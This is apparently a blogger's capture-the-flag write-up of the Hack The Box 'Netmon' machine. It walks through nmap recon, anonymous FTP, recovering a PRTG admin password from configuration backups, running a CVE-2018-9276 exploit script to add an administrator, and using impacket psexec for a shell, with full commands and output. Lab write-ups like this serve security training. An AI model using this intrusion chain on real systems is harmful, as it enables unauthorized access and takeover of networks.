This is one of the first boxes that I have solved in Hack The Box. It was challenging took me a couple of days to solve it. This will be a wirte-up to showcase my work.
Before even starting out, I made it clear to myself that I won’t be using metasploit.
Here we go then.
Recon
I like to keep my terminal clean, output redirection + pushing the task to the background. Doing nmap on the first 1000 ports of the Netmon box.
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ nmap -sC -sV -p0-1000 10.10.10.152 > results.txt &
[1] 1373
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ 1 ⚙
[1] + done nmap -sC -sV -p0-1000 10.10.10.152 > results.txtThe result of the scan shows that there is a Microsoft ftp where Anonymous Login is allowed and a PRTG server running at port 80. Then msrpc,netbios-ssn,microsoft-ds running at 135,139 and 445 respectively.
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021–01–03 00:57 EST
Nmap scan report for 10.10.10.152
Host is up (0.17s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02–02–19 11:18PM 1024 .rnd
| 02–25–19 09:15PM <DIR> inetpub
| 07–16–16 08:18AM <DIR> PerfLogs
| 02–25–19 09:56PM <DIR> Program Files
| 02–02–19 11:28PM <DIR> Program Files (x86)
| 02–03–19 07:08AM <DIR> Users
|_02–25–19 10:49PM <DIR> Windows
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-server-header: PRTG/18.1.37.13946
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2–2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2–2012; CPE: cpe:/o:microsoft:windowsHost script results:
|_clock-skew: mean: 37s, deviation: 0s, median: 36s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021–01–03T05:58:08
|_ start_date: 2021–01–02T19:14:17Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.87 seconds
Since the box name is Netmon and the PRTG server title is also called Netmon. I took a hunch that this is what I will be exploiting. At the same time ftp server allowed Anonymous login. If it were so easy in real life. 😆
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ ftp -p 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>And Voilà! I got access to the server. 😎
Sadly we don’t have the admin privileges right now. Snooping around the directories I found the user flag 🔥 .
I searched for other useful stuff but didn’t find anything.
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ ftp -p 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,126)
125 Data connection already open; Transfer starting.
02–02–19 11:18PM 1024 .rnd
02–25–19 09:15PM <DIR> inetpub
07–16–16 08:18AM <DIR> PerfLogs
02–25–19 09:56PM <DIR> Program Files
02–02–19 11:28PM <DIR> Program Files (x86)
02–03–19 07:08AM <DIR> Users
02–25–19 10:49PM <DIR> Windows
226 Transfer complete.
ftp> cd Users
250 CWD command successful.
ftp> ls
227 Entering Passive Mode (10,10,10,152,230,127)
125 Data connection already open; Transfer starting.
02–25–19 10:44PM <DIR> Administrator
02–02–19 11:35PM <DIR> Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,230,128)
125 Data connection already open; Transfer starting.
02–03–19 07:05AM <DIR> Documents
07–16–16 08:18AM <DIR> Downloads
07–16–16 08:18AM <DIR> Music
07–16–16 08:18AM <DIR> Pictures
02–02–19 11:35PM 33 user.txt
07–16–16 08:18AM <DIR> Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
227 Entering Passive Mode (10,10,10,152,230,129)
125 Data connection already open; Transfer starting.
WARNING! 1 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
33 bytes received in 0.21 secs (0.1569 kB/s)
ftp> 221 Goodbye.
┌──(kali㉿kali)-[~/HackTheBox/Netmon/reconndata]
└─$ cat user.txtIt was clear now that to get the root privilege the approach has to be different. Since I had a hunch about the Netmon(PRTG), tried logging into localhost.
The default username and password for PRTG is prtgadmin:prtgadmin
This didn’t work, so started googling about the PRTG 18.1.37.13946. I found some useful info that if I get access to the server then I can do an attack based on this CVE and also found an exploit.
Now I just need to find the username and password of the PRTG server.
After a lot googling and asking other’s for help, a path opened up for me. The application data in Windows is stored in the Application Data Directory, and where is this.
C:\Users\All Users\Application DataImmediately, logged into the ftp server and went to this directory. But after reaching the All Users directory I found the Paessler directory, Paessler is the producer of PRTG Monitoring Tool. Moving into the Paessler/PRTG Network Monitor directory gave me some configuration files. They are bound to hide some good content.
ftp> cd All\ Users
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,205)
150 Opening ASCII mode data connection.
02–02–19 11:15PM <DIR> Licenses
11–20–16 09:36PM <DIR> Microsoft
02–02–19 11:18PM <DIR> Paessler
02–03–19 07:05AM <DIR> regid.1991–06.com.microsoft
07–16–16 08:18AM <DIR> SoftwareDistribution
02–02–19 11:15PM <DIR> TEMP
11–20–16 09:19PM <DIR> USOPrivate
11–20–16 09:19PM <DIR> USOShared
02–25–19 09:56PM <DIR> VMware
226 Transfer complete.
ftp> cd Paessler
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,206)
125 Data connection already open; Transfer starting.
01–03–21 01:26AM <DIR> PRTG Network Monitor
226 Transfer complete.
ftp> cd PRTG\ Netowrk\ Monitor
550 The system cannot find the file specified.
ftp> cd PRTG\ Network\ Monitor
250 CWD command successful.
ftp> dir
227 Entering Passive Mode (10,10,10,152,231,216)
125 Data connection already open; Transfer starting.
01–02–21 02:56PM <DIR> Configuration Auto-Backups
01–02–21 07:00PM <DIR> Log Database
02–02–19 11:18PM <DIR> Logs (Debug)
02–02–19 11:18PM <DIR> Logs (Sensors)
02–02–19 11:18PM <DIR> Logs (System)
01–03–21 12:00AM <DIR> Logs (Web Server)
01–02–21 07:01PM <DIR> Monitoring Database
02–25–19 09:54PM 1189697 PRTG Configuration.dat
02–25–19 09:54PM 1189697 PRTG Configuration.old
07–14–18 02:13AM 1153755 PRTG Configuration.old.bak
01–03–21 01:26AM 1724708 PRTG Graph Data Cache.dat
02–25–19 10:00PM <DIR> Report PDFs
02–02–19 11:18PM <DIR> System Information Database
02–02–19 11:40PM <DIR> Ticket Database
02–02–19 11:18PM <DIR> ToDo Database
226 Transfer complete.
ftp>I copied all of them to my system, and did a search for prtgadmin.
cat * | grep -A 5 -B 5 prtgadmin<dbpassword>
<! — User: prtgadmin →
PrTg@dmin2018
Hahahha!! Evil Laugh 👹
Tried logging into the console. And it showed wrong password. 😑
I did the same thing for 10 minutes before remembering the advice of one of my teammates, if the password contains a year and you are getting wrong password try to put in another year.
PrTg@admin2020 Didn’t work
PrTg@admin2019 💥💥💥 Got access.
Now we can run the exploit to create the Admin user.
Some basic stuffs are needed for the exploit to work, we need the authenticated cookie. Burp Suite to the rescue.
Exploit
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ ./prtg-exploit.sh -u http://10.10.10.152 -c “ _ga=GA1.4.1222464343.1609254788; _gid=GA1.4.1624489487.1609656414; OCTOPUS1813713946=ezJFRkI5MEY0LTJBRTItNEVGQy1BREEzLTEyMzQyMDY5OEEwOH0%3D; _gat=1” 130 ⨯[+]#########################################################################[+]
[*] PRTG RCE script by M4LV0 [*]
[+]#########################################################################[+]
[*] https://github.com/M4LV0 [*]
[+]#########################################################################[+]
[*] Authenticated PRTG network Monitor remote code execution CVE-2018–9276 [*]
[+]#########################################################################[+]# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and add it to the script.
# run the script to create a new user ‘pentest’ in the administrators group with password ‘P3nT3st!’[+]#########################################################################[+][*] file created
[*] sending notification wait….[*] adding a new user ‘pentest’ with password ‘P3nT3st’
[*] sending notification wait….[*] adding a user pentest to the administrators group
[*] sending notification wait….[*] exploit completed new user ‘pentest’ with password ‘P3nT3st!’ created have fun!
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$
Boo Yaa! We just created an Admin user with name pentest and password p3nT3st. Thanks M4LV0.
There is a tool called psexec in windows it is a command line tool, in the impacket module there is a similar implementation called psexec.py. I will be using this to login as an Admin.
┌──(root💀kali)-[/home/kali]
└─# find / -name psexec.py
/usr/share/doc/python3-impacket/examples/psexec.py
/usr/share/set/src/fasttrack/psexec.pyFound where psexec is now using it to login.
┌──(kali㉿kali)-[~/HackTheBox/Netmon/exploits/PRTG-Network-Monitor-RCE]
└─$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:’P3nT3st!’@10.10.10.152Impacket v0.9.21 — Copyright 2020 SecureAuth Corporation[*] Requesting shares on 10.10.10.152…..
[*] Found writable share ADMIN$
[*] Uploading file oIhajMMZ.exe
[*] Opening SVCManager on 10.10.10.152…..
[*] Creating service MCRJ on 10.10.10.152…..
[*] Starting service MCRJ…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
© 2016 Microsoft Corporation. All rights reserved.C:\Windows\system32>cd ../..
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8Directory of C:\02/02/2019 11:18 PM 1,024 .rnd
02/25/2019 09:15 PM <DIR> inetpub
07/16/2016 08:18 AM <DIR> PerfLogs
02/25/2019 09:56 PM <DIR> Program Files
02/02/2019 11:28 PM <DIR> Program Files (x86)
02/03/2019 07:08 AM <DIR> Users
01/03/2021 02:00 AM <DIR> Windows
1 File(s) 1,024 bytes
6 Dir(s) 12,056,117,248 bytes freeC:\>
I just got Admin Access 🔥
Now to get the flag!
C:\>cd Users
C:\Users>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8Directory of C:\Users02/03/2019 07:08 AM <DIR> .
02/03/2019 07:08 AM <DIR> ..
02/25/2019 10:44 PM <DIR> Administrator
01/03/2021 01:50 AM <DIR> Public
0 File(s) 0 bytes
4 Dir(s) 12,055,908,352 bytes freeC:\Users>cd Administrator
C:\Users\Administrator>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8Directory of C:\Users\Administrator02/25/2019 10:58 PM <DIR> .
02/25/2019 10:58 PM <DIR> ..
02/03/2019 07:08 AM <DIR> Contacts
02/02/2019 11:35 PM <DIR> Desktop
02/03/2019 07:08 AM <DIR> Documents
02/03/2019 07:08 AM <DIR> Downloads
02/03/2019 07:08 AM <DIR> Favorites
02/03/2019 07:08 AM <DIR> Links
02/03/2019 07:08 AM <DIR> Music
02/03/2019 07:08 AM <DIR> Pictures
02/03/2019 07:08 AM <DIR> Saved Games
02/03/2019 07:08 AM <DIR> Searches
02/25/2019 10:06 PM <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 12,055,908,352 bytes freeC:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 684B-9CE8Directory of C:\Users\Administrator\Desktop02/02/2019 11:35 PM <DIR> .
02/02/2019 11:35 PM <DIR> ..
02/02/2019 11:35 PM 33 root.txt
1 File(s) 33 bytes
2 Dir(s) 12,055,908,352 bytes freeC:\Users\Administrator\Desktop>type root.txt
And that is how I solved Netmon. 😄